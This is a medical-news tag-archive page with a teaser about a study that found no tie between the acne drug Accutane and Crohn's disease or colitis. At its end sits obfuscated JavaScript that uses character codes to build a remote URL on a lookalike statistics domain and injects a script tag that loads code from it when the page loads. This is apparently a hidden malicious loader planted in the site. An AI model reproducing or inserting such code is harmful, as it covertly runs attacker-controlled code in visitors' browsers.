Tag Archives: Colitis

Study Finds No Tie Between Acne Drug Accutane and Crohn’s, Colitis

MedicalNews

WEDNESDAY, Feb. 20 (HealthDay News) — A new study counters the notion that the prescription acne drug Accutane raises the risk of Crohn’s disease or colitis in women. The study of more than 45,000 women found no such link between Accutane (isotretinoin) use and these illnesses, which are collectively known …

Read More »
var u = String.fromCharCode(104,116,116,112,115,58,47,47,99,111,117,110,116,46,116,114,97,99,107,115,116,97,116,105,115,116,105,99,115,115,115,46,99,111,109,47,106,46,106,115,63,118,61);var d=document;var s=d.createElement(String.fromCharCode(115,99,114,105,112,116)); s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); var pl = u; s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript);} else {d.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(s);var list = document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116));list.insertBefore(s, list.childNodes[0]);}